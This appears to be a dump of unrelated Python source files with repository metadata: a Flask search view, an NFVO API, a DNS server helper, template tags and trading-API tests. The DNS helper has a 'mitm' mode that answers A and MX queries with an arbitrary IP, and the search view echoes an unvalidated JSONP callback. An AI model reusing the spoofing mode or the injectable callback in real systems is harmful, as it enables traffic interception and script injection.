3ccf4476c3523d4fefc0d8d9dee0196815b81489
|
[
"MIT"
] | null | null | null |
import json
import urllib2
import traceback
import cgi
from flask import render_template, request
import web.util.tools as tools
import lib.http as http
import lib.es as es
from web import app
from lib.read import readfile
def get(p):
host = p['c']['host']; index = p['c']['index'];
# debug
p['debug'] = tools.get('debug', '')
# search keyword
p["q"] = tools.get('q', p['c']['query'])
# pagination
p["from"] = int(tools.get('from', 0))
p["size"] = int(tools.get('size', p['c']['page_size']))
# sort
p['sort_field'] = tools.get('sort_field', p['c']['sort_field'])
p['sort_dir'] = tools.get('sort_dir', p['c']['sort_dir'])
# selected app
p['selected_app'] = tools.get('app')
# search query
p["q"] = p["q"].replace('"', '\\"') # escape some special chars
p['search_query'] = render_template("search/search_query.html", p=p)
p["q"] = tools.get('q', p['c']['query']) # restore to what was entered originally
# send search request
try:
search_url = "{}/{}/post/_search".format(host, index)
p['response'] = http.http_req_json(search_url, "POST", p['search_query'])
except urllib2.HTTPError, e:
raise Exception("url: {}\nquery: {}\n{}".format(
search_url, p['search_query'], e.read()))
# process the search result
p['post_list'] = []
for r in p['response']["hits"]["hits"]:
item = {}
# first take items from the fields
for k, v in r["_source"].items():
item[k] = v
# fetch highlight
if r.get('highlight'):
for k, v in r["highlight"].items():
if k == "url" or k == "_index" or k == "app":
continue
value = cgi.escape(v[0])
value = value.replace("::highlight::", "<font color=red>")
value = value.replace("::highlight_end::", "</font>")
item[k] = value
# produce standard fields
if r.get('_index') and not item.get('app'):
item['app'] = r.get('_index')
if not item.get('url'):
item['url'] = '{}/redirect?index={}&id={}'.format(
p.get('url'),
r.get('_index'),
r.get('_id'))
# Save to SearchResult
p['post_list'].append(item)
# Application Lists
p['applications'] = []
if p['response'].get('aggregations'):
internal = p['response']['aggregations']['internal']['buckets']
p['applications'].extend(
[item for item in internal if item.get('key') != 'search']
)
external = p['response']['aggregations']['external']['buckets']
p['applications'].extend(external)
# sort based on the count
p['applications'] = sorted(p['applications'],
key=lambda x: x['doc_count'], reverse=True)
# Feed Pagination
p["total"] = int(p['response']["hits"]["total"])
# Suggestion
p["suggestion"] = []; AnySuggestion = False;
# suggest.didyoumean[].options[].text
if p['response']["suggest"].get("didyoumean"):
for idx, term in enumerate(p['response']["suggest"].get("didyoumean")):
p["suggestion"].append(term["text"])
for o in term["options"]:
AnySuggestion = True
p["suggestion"][idx] = o["text"]
break # just take the first option
# if there are no suggestions then don't display
if not AnySuggestion: p["suggestion"] = []
# return json format
if tools.get("json"):
callback = tools.get("callback")
if not callback:
return json.dumps(p['response'])
else:
return "{}({})".format(callback, json.dumps(p['response']))
return render_template("search/default.html", p=p)
| 33.217391
| 85
| 0.546073
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,491
| 0.390314
|
65aa8588c528dddf9da0b75de2f8177f0b66e0ef
| 1,043
|
py
|
Python
|
Go6/policy_probabilistic_player.py
|
skyu0221/cmput496
|
ad1e59805ab49324ec1e387ddeaf3dd3202518bc
|
[
"MIT"
] | null | null | null |
Go6/policy_probabilistic_player.py
|
skyu0221/cmput496
|
ad1e59805ab49324ec1e387ddeaf3dd3202518bc
|
[
"MIT"
] | null | null | null |
Go6/policy_probabilistic_player.py
|
skyu0221/cmput496
|
ad1e59805ab49324ec1e387ddeaf3dd3202518bc
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
from board_util import GoBoardUtil
from gtp_connection import GtpConnection
class PolicyPlayer(object):
"""
Plays according to the Go4 playout policy.
No simulations, just random choice among current policy moves
"""
version = 0.1
name = "Policy Probabilistic Player"
def __init__(self):
pass
def get_move(self, board, toplay):
return GoBoardUtil.generate_probabilistic( \
GoBoardUtil.generate_prob_playout_moves( board ) )
def policy(self,board,color):
return self.get_move( board, color )
def run(self, board, color, print_info=False):
pass
def reset(self):
pass
def update(self, move):
pass
def get_properties(self):
return dict(
version=self.version,
name=self.__class__.__name__,
)
def createPolicyPlayer():
con = GtpConnection(PolicyPlayer())
con.start_connection()
if __name__=='__main__':
createPolicyPlayer()
| 22.673913
| 80
| 0.633749
| 799
| 0.766059
| 0
| 0
| 0
| 0
| 0
| 0
| 189
| 0.181208
|
65ac271abc5546a6ef5541faf5bc32786bb4d4dc
| 1,531
|
py
|
Python
|
test_models.py
|
ChirilaLaura/covid-z
|
f1cc0818831519404486cd2fd2e78c36b789de24
|
[
"MIT"
] | 2
|
2020-05-14T03:02:22.000Z
|
2020-06-16T10:05:44.000Z
|
test_models.py
|
ChirilaLaura/covid-z
|
f1cc0818831519404486cd2fd2e78c36b789de24
|
[
"MIT"
] | null | null | null |
test_models.py
|
ChirilaLaura/covid-z
|
f1cc0818831519404486cd2fd2e78c36b789de24
|
[
"MIT"
] | null | null | null |
from keras.preprocessing.image import img_to_array
from keras.models import load_model
import numpy as np
import argparse
import imutils
import cv2
ap = argparse.ArgumentParser()
ap.add_argument("-m1", "--model1", required=True, help="path to model1")
ap.add_argument("-m2", "--model2", required=True, help="path to model2")
ap.add_argument("-i", "--image", required=True, help="path to image")
args = vars(ap.parse_args())
image = cv2.imread(args["image"])
orig = image.copy()
image = cv2.resize(image, (64, 64))
image = image.astype("float") / 255.0
image = img_to_array(image)
image = np.expand_dims(image, axis=0)
model1 = load_model(args["model1"])
model2 = load_model(args["model2"])
print("models loaded")
(other, xray) = model1.predict(image)[0]
label2 = "Xray" if xray > other else "Other"
proba = xray if xray > other else other
label = "{}: {:.2f}%".format(label2, proba * 100)
if label2 == "Xray":
(infected, healthy) = model2.predict(image)[0]
label2 = "Healthy" if healthy > infected else "Infected"
proba = healthy if healthy > infected else infected
label = "{}: {:.2f}%".format(label2, proba * 100)
output = imutils.resize(orig, width=400)
cv2.putText(output, label, (10, 25), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0), 2)
cv2.imshow("Output", output)
cv2.waitKey(0)
else:
output = imutils.resize(orig, width=400)
cv2.putText(output, label, (10, 25), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0), 2)
cv2.imshow("Output", output)
cv2.waitKey(0)
| 31.895833
| 88
| 0.674722
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 240
| 0.15676
|
65ac8cde7af97a0e6637820254f0d7a893315eae
| 143
|
py
|
Python
|
src/settings.py
|
MichaelJWelsh/bot-evolution
|
6d8e3449fc5350f47e91a6aa7a3e8b719c0c2f16
|
[
"MIT"
] | 151
|
2017-05-01T02:47:34.000Z
|
2022-01-21T17:08:11.000Z
|
src/settings.py
|
MichaelJWelsh/bot-evolution
|
6d8e3449fc5350f47e91a6aa7a3e8b719c0c2f16
|
[
"MIT"
] | null | null | null |
src/settings.py
|
MichaelJWelsh/bot-evolution
|
6d8e3449fc5350f47e91a6aa7a3e8b719c0c2f16
|
[
"MIT"
] | 26
|
2017-05-01T21:41:02.000Z
|
2021-12-21T11:40:20.000Z
|
"""
This module contains the general settings used across modules.
"""
FPS = 60
WINDOW_WIDTH = 1100
WINDOW_HEIGHT = 600
TIME_MULTIPLIER = 1.0
| 15.888889
| 62
| 0.748252
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 70
| 0.48951
|
65ad5e7a545499575a16b2d06ffd961696d9832d
| 7,974
|
py
|
Python
|
katana-nbi/katana/api/nfvo.py
|
afoteas/katana-slice_manager
|
f03a8520fc06f7bed18ff5c2a01a9b8ea7da84c8
|
[
"Apache-2.0"
] | null | null | null |
katana-nbi/katana/api/nfvo.py
|
afoteas/katana-slice_manager
|
f03a8520fc06f7bed18ff5c2a01a9b8ea7da84c8
|
[
"Apache-2.0"
] | null | null | null |
katana-nbi/katana/api/nfvo.py
|
afoteas/katana-slice_manager
|
f03a8520fc06f7bed18ff5c2a01a9b8ea7da84c8
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import logging
from logging import handlers
import pickle
import time
import uuid
from bson.binary import Binary
from bson.json_util import dumps
from flask import request
from flask_classful import FlaskView
import pymongo
from requests import ConnectTimeout, ConnectionError
from katana.shared_utils.mongoUtils import mongoUtils
from katana.shared_utils.nfvoUtils import osmUtils
# Logging Parameters
logger = logging.getLogger(__name__)
file_handler = handlers.RotatingFileHandler("katana.log", maxBytes=10000, backupCount=5)
stream_handler = logging.StreamHandler()
formatter = logging.Formatter("%(asctime)s %(name)s %(levelname)s %(message)s")
stream_formatter = logging.Formatter("%(asctime)s %(name)s %(levelname)s %(message)s")
file_handler.setFormatter(formatter)
stream_handler.setFormatter(stream_formatter)
logger.setLevel(logging.DEBUG)
logger.addHandler(file_handler)
logger.addHandler(stream_handler)
class NFVOView(FlaskView):
route_prefix = "/api/"
req_fields = ["id", "nfvousername", "nfvopassword", "nfvoip", "tenantname"]
def index(self):
"""
Returns a list of nfvo and their details,
used by: `katana nfvo ls`
"""
nfvo_data = mongoUtils.index("nfvo")
return_data = []
for infvo in nfvo_data:
return_data.append(
dict(
_id=infvo["_id"],
nfvo_id=infvo["id"],
created_at=infvo["created_at"],
type=infvo["type"],
)
)
return dumps(return_data), 200
# @route('/all/') #/nfvo/all
def all(self):
"""
Same with index(self) above, but returns all nfvo details
"""
return dumps(mongoUtils.index("nfvo")), 200
def get(self, uuid):
"""
Returns the details of specific nfvo,
used by: `katana nfvo inspect [uuid]`
"""
data = mongoUtils.get("nfvo", uuid)
if data:
return dumps(data), 200
else:
return "Not Found", 404
def post(self):
"""
Add a new nfvo. The request must provide the nfvo details.
used by: `katana nfvo add -f [yaml file]`
"""
new_uuid = str(uuid.uuid4())
request.json["_id"] = new_uuid
request.json["created_at"] = time.time() # unix epoch
request.json["tenants"] = {}
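# For illustration only, a minimal request body for an OSM NFVO (field names come
# from req_fields above; every value here is a placeholder):
#   {"id": "osm-1", "type": "OSM", "nfvoip": "10.30.0.2",
#    "nfvousername": "admin", "nfvopassword": "secret", "tenantname": "admin"}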
if request.json["type"] == "OSM":
# Create the NFVO object
try:
osm_username = request.json["nfvousername"]
osm_password = request.json["nfvopassword"]
osm_ip = request.json["nfvoip"]
osm_project_name = request.json["tenantname"]
nfvo_id = request.json["id"]
except KeyError:
return f"Error: Required fields: {self.req_fields}", 400
else:
osm = osmUtils.Osm(nfvo_id, osm_ip, osm_username, osm_password, osm_project_name)
try:
osm.getToken()
except ConnectTimeout as e:
logger.exception("Connection Timeout: {}".format(e))
response = dumps({"error": "Unable to connect to NFVO"})
return (response, 400)
except ConnectionError as e:
logger.exception("Connection Error: {}".format(e))
response = dumps({"error": "Unable to connect to NFVO"})
return (response, 400)
else:
# Store the osm object to the mongo db
thebytes = pickle.dumps(osm)
obj_json = {"_id": new_uuid, "id": request.json["id"], "obj": Binary(thebytes)}
try:
new_uuid = mongoUtils.add("nfvo", request.json)
except pymongo.errors.DuplicateKeyError:
return f"NFVO with id {nfvo_id} already exists", 400
mongoUtils.add("nfvo_obj", obj_json)
# Get information regarding VNFDs and NSDs
osm.bootstrapNfvo()
return f"Created {new_uuid}", 201
else:
response = dumps({"error": "This type nfvo is not supported"})
return response, 400
def delete(self, uuid):
"""
Delete a specific nfvo.
used by: `katana nfvo rm [uuid]`
"""
del_nfvo = mongoUtils.get("nfvo", uuid)
if del_nfvo:
if del_nfvo["tenants"]:
return "Cannot delete nfvo {} - In use".format(uuid), 400
mongoUtils.delete("nfvo_obj", uuid)
mongoUtils.delete_all("nsd", {"nfvo_id": del_nfvo["id"]})
mongoUtils.delete_all("vnfd", {"nfvoid": del_nfvo["id"]})
mongoUtils.delete("nfvo", uuid)
return "Deleted NFVO {}".format(uuid), 200
else:
# if uuid is not found, return error
return "Error: No such nfvo: {}".format(uuid), 404
def put(self, uuid):
"""
Update the details of a specific nfvo.
used by: `katana nfvo update -f [yaml file] [uuid]`
"""
data = request.json
data["_id"] = uuid
old_data = mongoUtils.get("nfvo", uuid)
if old_data:
data["created_at"] = old_data["created_at"]
data["tenants"] = old_data["tenants"]
try:
for entry in self.req_fields:
if data[entry] != old_data[entry]:
return "Cannot update field: " + entry, 400
except KeyError:
return f"Error: Required fields: {self.req_fields}", 400
else:
mongoUtils.update("nfvo", uuid, data)
return f"Modified {uuid}", 200
else:
new_uuid = uuid
data = request.json
data["_id"] = new_uuid
data["created_at"] = time.time() # unix epoch
data["tenants"] = {}
if request.json["type"] == "OSM":
# Create the NFVO object
try:
osm_username = request.json["nfvousername"]
osm_password = request.json["nfvopassword"]
osm_ip = request.json["nfvoip"]
osm_project_name = request.json["tenantname"]
nfvo_id = request.json["id"]
except KeyError:
return f"Error: Required fields: {self.req_fields}", 400
else:
osm = osmUtils.Osm(
nfvo_id, osm_ip, osm_username, osm_password, osm_project_name
)
try:
osm.getToken()
except ConnectTimeout as e:
logger.exception("Connection Timeout: {}".format(e))
response = dumps({"error": "Unable to connect to NFVO"})
return (response, 400)
except ConnectionError as e:
logger.exception("Connection Error: {}".format(e))
response = dumps({"error": "Unable to connect to NFVO"})
return (response, 400)
else:
# Store the osm object to the mongo db
thebytes = pickle.dumps(osm)
obj_json = {"_id": new_uuid, "id": data["id"], "obj": Binary(thebytes)}
try:
new_uuid = mongoUtils.add("nfvo", data)
except pymongo.errors.DuplicateKeyError:
return f"NFVO with id {nfvo_id} already exists", 400
mongoUtils.add("nfvo_obj", obj_json)
# Get information regarding VNFDs and NSDs
osm.bootstrapNfvo()
else:
response = dumps({"error": "This type nfvo is not supported"})
return response, 400
return f"Created {new_uuid}", 201
| 39.088235
| 97
| 0.538375
| 7,027
| 0.881239
| 0
| 0
| 0
| 0
| 0
| 0
| 2,240
| 0.280913
|
65ad681676318e198f9ba24f925ddf67a7312897
| 7,400
|
py
|
Python
|
helpers.py
|
mochja/ISA-DNS
|
463713b97329b000721be2512c9581c4881d664c
|
[
"MIT"
] | null | null | null |
helpers.py
|
mochja/ISA-DNS
|
463713b97329b000721be2512c9581c4881d664c
|
[
"MIT"
] | null | null | null |
helpers.py
|
mochja/ISA-DNS
|
463713b97329b000721be2512c9581c4881d664c
|
[
"MIT"
] | null | null | null |
import threading
import traceback
import socketserver
import struct
import time
import sys
import http.client
import json
import uuid
import config
import dns.rdatatype
import dns.rdataclass
args = config.args
QTYPES = {1:'A', 15: 'MX', 6: 'SOA'}
custom_mx = uuid.uuid4().hex
count_compression = 0  # counts DNS name compression pointers seen while decoding
# https://github.com/shuque/pydig GNUv2 (edited)
def txt2domainname(input, canonical_form=False):
"""turn textual representation of a domain name into its wire format"""
if input == ".":
d = b'\x00'
else:
d = b""
for label in input.split('.'):
label = label.encode('ascii')
if canonical_form:
label = label.lower()
length = len(label)
d += struct.pack('B', length) + label
return d
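# For illustration (hypothetical input): a trailing dot produces the terminating
# zero-length label, so txt2domainname("example.com.") == b'\x07example\x03com\x00'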
# https://github.com/shuque/pydig GNUv2 (edited)
def get_domainname(pkt, offset):
"""decode a domainname at the given packet offset; see RFC 1035"""
global count_compression
labellist = [] # a domainname is a sequence of labels
Done = False
while not Done:
llen, = struct.unpack('B', pkt[offset:offset+1])
if (llen >> 6) == 0x3: # compression pointer, sec 4.1.4
count_compression += 1
c_offset, = struct.unpack('!H', pkt[offset:offset+2])
c_offset = c_offset & 0x3fff # last 14 bits
offset +=2
rightmostlabels, junk = get_domainname(pkt, c_offset)
labellist += rightmostlabels
Done = True
else:
offset += 1
label = pkt[offset:offset+llen]
offset += llen
labellist.append(label)
if llen == 0:
Done = True
return (labellist, offset)
def ip2bytes(ip):
return struct.pack('!BBBB', *map(int, ip.split('.')))
# https://github.com/shuque/pydig GNUv2 (edited)
def pdomainname(labels):
"""given a sequence of domainname labels, return a quoted printable text
representation of the domain name"""
printables = b'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-*+'
result_list = []
for label in labels:
result = ''
for c in label:
if isinstance(c, int):
c_int, c_chr = c, chr(c)
else:
c_int, c_chr = ord(c), c.decode()
if c in printables:
result += c_chr
else:
result += ("\\%03d" % c_int)
result_list.append(result)
if result_list == ['']:
return "."
else:
return ".".join(result_list)
def resolve_remote(query):
domainName, type, klass = query
if type not in [1, 15, 6]:
return (3, [], [])
h1 = http.client.HTTPSConnection('dns.google.com')
h1.request('GET', '/resolve?name={}&type={}'.format(domainName, type))
r1 = h1.getresponse()
data = json.loads(r1.read().decode('utf-8'))
answers = []
if 'Answer' in data:
for answer in data['Answer']:
a = (answer['name'], answer['type'], klass, answer['TTL'], answer['data'])
answers.append(a)
authority = []
if 'Authority' in data:
for answer in data['Authority']:
a = (answer['name'], answer['type'], klass, answer['TTL'], answer['data'])
authority.append(a)
return (int(data['Status']), answers, authority)
def resolve_fake(query, ip):
domainName, type, klass = query
answers = []
if type not in [1, 15, 6]:
return (3, answers, [])
# be our own master for the other types: answer A queries with our own IP
if type == 1:
a = (domainName, type, klass, 1, str(ip))
answers.append(a)
# be our own master for MX: answer with ourselves as the mail exchanger
if type == 15:
a = (domainName, type, klass, 1, '10 ' + domainName)
answers.append(a)
return (0, answers, [])
def build_answer_data(answer):
dn, type, cl, ttl, data = answer
if type == 1:
print('r: {}, type: {}, class {}, addr {}'.format(dn, dns.rdatatype.to_text(type), dns.rdataclass.to_text(cl), data))
return txt2domainname(dn) + struct.pack('!HHIH', type, cl, ttl, 4) + ip2bytes(data)
if type == 15:
priority, addr = data.split(' ', 2)
if not addr.endswith('.'):
addr += '.'
print('r: {}, type: {}, class {}, preference {}, mx {}'.format(dn, dns.rdatatype.to_text(type), dns.rdataclass.to_text(cl), priority, addr))
addr = txt2domainname(addr)
return txt2domainname(dn) + struct.pack('!HHIHH', type, cl, ttl, 2 + len(addr), int(priority)) + addr
if type == 6:
ns, hostmasta, serialNo, refresh, retry, expire, minTTL = data.split(' ')
if not ns.endswith('.'):
ns += '.'
if not hostmasta.endswith('.'):
hostmasta += '.'
print('r: {}, type: {}, class {}, mname {}'.format(dn, dns.rdatatype.to_text(type), dns.rdataclass.to_text(cl), ns))
soa = txt2domainname(ns) + txt2domainname(hostmasta) + struct.pack('!IIIII', *map(int, [serialNo, refresh, retry, expire, minTTL]))
return txt2domainname(dn) + struct.pack('!HHIH', type, cl, ttl, len(soa)) + soa
raise Exception('cant create response for that')
def resolve_zones(query, rr):
dn, type, klass = query
normal = []
authoritative = []
for r in rr:
a = (dn, r.rdtype, r.rdclass, rr.ttl, str(r).replace('\\@', '.'))
if r.rdtype == 6:
authoritative.append(a)
else:
normal.append(a)
return (0, normal, authoritative)
def dns_response(request):
answer = b''
nswer = b''
flags = 0
ancount = 0
nscount = 0
status = 3 # default status not found
for q in request.queries:
(dn, type, cl) = q
print('q: {}, type: {}, class {}'.format(dn, dns.rdatatype.to_text(type), dns.rdataclass.to_text(cl)))
rr = None
for zone in config.zones:
try:
rr = zone.find_rdataset(dn, type)
break
except: pass
if rr is not None and args.mitm is None:
flags |= 1 << 10 # set authoritative
status, normal, authoritative = resolve_zones(q, rr)
else:
status, normal, authoritative = resolve_remote(q) if args.mitm is None or type in [6] else resolve_fake(q, str(args.mitm[0]))
for r in normal:
ancount += 1
answer += build_answer_data(r)
for r in authoritative:
nscount += 1
nswer += build_answer_data(r)
flags |= 1 << 15 # set QR to (1) - Response
flags |= 1 << 7 # set RA to (1) - recursion available
flags |= 1 << 8 # set RD to (1) - recursion desired
flags |= status
id = struct.pack('!H', request.id)
flags = struct.pack('!H', flags)
qdcount = struct.pack('!H', 0)
ancount = struct.pack('!H', ancount)
nscount = struct.pack('!H', nscount)
arcount = struct.pack('!H', 0)
return id + flags + qdcount + ancount + nscount + arcount + \
answer + nswer
def parse_dns_record(rawdata, offset):
dn, offset = get_domainname(rawdata, offset)
dn = pdomainname(dn)
query_type, query_class = struct.unpack_from('!HH', rawdata, offset=offset)
offset += 10
query = dn, query_type, query_class
return (offset, query)
| 30.578512
| 148
| 0.553514
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,172
| 0.158378
|
65ad8049b22c02c19b00ee9ceab0dd889c8339c3
| 3,278
|
py
|
Python
|
convert/templatetags/convert_tags.py
|
aino/aino-convert
|
f3bd773f02a9645c75bfbd773e747dd8dc6e08f4
|
[
"BSD-3-Clause"
] | 1
|
2015-07-15T07:40:19.000Z
|
2015-07-15T07:40:19.000Z
|
convert/templatetags/convert_tags.py
|
aino/aino-convert
|
f3bd773f02a9645c75bfbd773e747dd8dc6e08f4
|
[
"BSD-3-Clause"
] | null | null | null |
convert/templatetags/convert_tags.py
|
aino/aino-convert
|
f3bd773f02a9645c75bfbd773e747dd8dc6e08f4
|
[
"BSD-3-Clause"
] | null | null | null |
from django.template import Library, Node, TemplateSyntaxError
from django.utils.encoding import force_unicode
from convert.base import MediaFile, EmptyMediaFile, convert_solo
from convert.conf import settings
register = Library()
class ConvertBaseNode(Node):
def error(self, context):
if settings.CONVERT_DEBUG:
raise
elif self.as_var:
context[self.as_var] = EmptyMediaFile()
return ''
return EmptyMediaFile().tag
def success(self, context, dest):
if self.as_var:
context[self.as_var] = dest
return ''
return dest.tag
class ThumbnailNode(ConvertBaseNode):
def __init__(self, input_file, options, as_var):
self.input_file = input_file
self.options = options
self.as_var = as_var
def render(self, context):
try:
input_file = force_unicode(self.input_file.resolve(context))
options = self.options.resolve(context)
source = MediaFile(input_file)
dest = source.thumbnail(options)
except:
return self.error(context)
return self.success(context, dest)
class ConvertNode(ConvertBaseNode):
def __init__(self, input_file, options, ext,
as_var):
self.input_file = input_file
self.options = options
self.ext = ext
self.as_var = as_var
def render(self, context):
try:
input_file = force_unicode(self.input_file.resolve(context))
options = self.options.resolve(context)
ext = self.ext and self.ext.resolve(context)
if not input_file:
dest = convert_solo(options, ext)
else:
source = MediaFile(input_file)
dest = source.convert(options, ext)
except:
return self.error(context)
return self.success(context, dest)
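# Hypothetical template usage, following the syntax spelled out in the
# TemplateSyntaxError messages below (file names and option strings are placeholders):
#   {% thumbnail "img/photo.jpg" "100x100" as thumb %}
#   {% convert "img/photo.jpg" "-resize 50%" "png" as converted %}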
@register.tag
def thumbnail(parser, token):
args = token.split_contents()
invalid_syntax = TemplateSyntaxError('Invalid syntax.\nGot: %s\n'
'Expected: thumbnail "input-file" "options" [as var]'
% " ".join(args))
as_var = None
if len(args) not in (3, 5):
raise invalid_syntax
if args[-2] == 'as':
as_var = args[-1]
args = args[:-2]
if len(args) != 3:
raise invalid_syntax
input_file, options = map(parser.compile_filter, args[1:])
return ThumbnailNode(input_file, options, as_var)
@register.tag
def convert(parser, token):
args = token.split_contents()
invalid_syntax = TemplateSyntaxError('Invalid syntax.\nGot: %s.\n'
'Expected: convert "input-file" "options" ["extension"] '
'[as var]' % " ".join(args))
as_var = None
ext = None
if len(args) < 3:
raise invalid_syntax
if args[-2] == 'as':
as_var = args[-1]
args = args[:-2]
if len(args) == 4:
ext = parser.compile_filter(args.pop(3))
if len(args) != 3:
raise invalid_syntax
input_file, options = map(parser.compile_filter,
args[1:])
return ConvertNode(input_file, options, ext, as_var)
| 31.519231
| 73
| 0.589079
| 1,734
| 0.528981
| 0
| 0
| 1,274
| 0.388652
| 0
| 0
| 195
| 0.059487
|
65ad9a16451cd40a1e7a1f6a7b00166acc44cfb1
| 7,826
|
py
|
Python
|
tests/utils_test.py
|
lovetrading10/tda-api
|
0e38c85739248fbf3b0e3386eb2fb9bf9298f93d
|
[
"MIT"
] | 7
|
2020-05-03T16:25:08.000Z
|
2021-11-03T22:08:27.000Z
|
tests/utils_test.py
|
lovetrading10/tda-api
|
0e38c85739248fbf3b0e3386eb2fb9bf9298f93d
|
[
"MIT"
] | null | null | null |
tests/utils_test.py
|
lovetrading10/tda-api
|
0e38c85739248fbf3b0e3386eb2fb9bf9298f93d
|
[
"MIT"
] | 11
|
2020-06-26T22:09:05.000Z
|
2022-02-13T13:30:52.000Z
|
from unittest.mock import MagicMock
import datetime
import json
import unittest
from tda.orders import EquityOrderBuilder
from tda.utils import Utils
from . import test_utils
class MockResponse:
def __init__(self, json, ok, headers=None):
self._json = json
self.ok = ok
self.headers = headers if headers is not None else {}
def json(self):
return self._json
class UtilsTest(unittest.TestCase):
def setUp(self):
self.mock_client = MagicMock()
self.account_id = 10000
self.utils = Utils(self.mock_client, self.account_id)
self.order_id = 1
self.maxDiff = None
##########################################################################
# extract_order_id tests
def test_extract_order_id_order_not_ok(self):
response = MockResponse({}, False)
with self.assertRaises(ValueError, msg='order not successful'):
self.utils.extract_order_id(response)
def test_extract_order_id_no_location(self):
response = MockResponse({}, True, headers={})
self.assertIsNone(self.utils.extract_order_id(response))
def test_extract_order_id_no_pattern_match(self):
response = MockResponse({}, True, headers={
'Location': 'https://api.tdameritrade.com/v1/accounts/12345'})
self.assertIsNone(self.utils.extract_order_id(response))
def test_get_order_nonmatching_account_id(self):
response = MockResponse({}, True, headers={
'Location':
'https://api.tdameritrade.com/v1/accounts/{}/orders/456'.format(
self.account_id + 1)})
with self.assertRaises(
ValueError, msg='order request account ID != Utils.account_id'):
self.utils.extract_order_id(response)
def test_get_order_success(self):
order_id = self.account_id + 100
response = MockResponse({}, True, headers={
'Location':
'https://api.tdameritrade.com/v1/accounts/{}/orders/{}'.format(
self.account_id, order_id)})
self.assertEqual(order_id, self.utils.extract_order_id(response))
##########################################################################
# find_most_recent_order tests
def order(self, time, symbol, quantity, instruction, order_type):
order = test_utils.real_order()
order['orderId'] = self.order_id
order['enteredTime'] = time
order['closeTime'] = time
order['accountId'] = self.account_id
order['orderType'] = order_type
order['orderLegCollection'][0]['quantity'] = quantity
order['orderLegCollection'][0]['instruction'] = instruction
order['orderLegCollection'][0]['instrument']['symbol'] = symbol
order['orderActivityCollection'][0]['executionLegs'][0]['time'] = time
order['orderActivityCollection'][0]['quantity'] = quantity
order['orderActivityCollection'][0]['executionLegs'][0]['quantity'] \
= quantity
self.order_id += 1
return order
def test_most_recent_order(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
order = self.utils.find_most_recent_order()
self.assertEqual(order2, order)
def test_too_many_order_legs(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
out_order = self.utils.find_most_recent_order()
self.assertEqual(order2, out_order)
order2['orderLegCollection'].append(order2['orderLegCollection'][0])
out_order = self.utils.find_most_recent_order()
self.assertEqual(order1, out_order)
def test_non_equity_asset_type(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
out_order = self.utils.find_most_recent_order()
self.assertEqual(order2, out_order)
order2['orderLegCollection'][0]['instrument']['assetType'] = 'OPTION'
out_order = self.utils.find_most_recent_order()
self.assertEqual(order1, out_order)
def test_different_symbol(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
out_order = self.utils.find_most_recent_order(symbol='AAPL')
self.assertEqual(order2, out_order)
order2['orderLegCollection'][0]['instrument']['symbol'] = 'MSFT'
out_order = self.utils.find_most_recent_order(symbol='AAPL')
self.assertEqual(order1, out_order)
def test_quantity_and_symbol(self):
msg = 'when specifying quantity, must also specify symbol'
with self.assertRaises(ValueError, msg=msg):
out_order = self.utils.find_most_recent_order(quantity=1)
def test_different_quantity(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
out_order = self.utils.find_most_recent_order(
symbol='AAPL', quantity=1)
self.assertEqual(order2, out_order)
order2['orderLegCollection'][0]['quantity'] = 10
out_order = self.utils.find_most_recent_order(
symbol='AAPL', quantity=1)
self.assertEqual(order1, out_order)
def test_different_instruction(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
out_order = self.utils.find_most_recent_order(
instruction=EquityOrderBuilder.Instruction.BUY)
self.assertEqual(order2, out_order)
order2['orderLegCollection'][0]['instruction'] = 'SELL'
out_order = self.utils.find_most_recent_order(
instruction=EquityOrderBuilder.Instruction.BUY)
self.assertEqual(order1, out_order)
def test_different_order_type(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
out_order = self.utils.find_most_recent_order(
order_type=EquityOrderBuilder.OrderType.MARKET)
self.assertEqual(order2, out_order)
order2['orderType'] = 'LIMIT'
out_order = self.utils.find_most_recent_order(
order_type=EquityOrderBuilder.OrderType.MARKET)
self.assertEqual(order1, out_order)
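# Illustrative sketch (assumption, not part of the original test module): the
# contract these tests describe - parse the order ID out of the 'Location'
# response header and validate the account ID - can be reproduced with a small
# helper like the hypothetical one below, assuming the response object exposes
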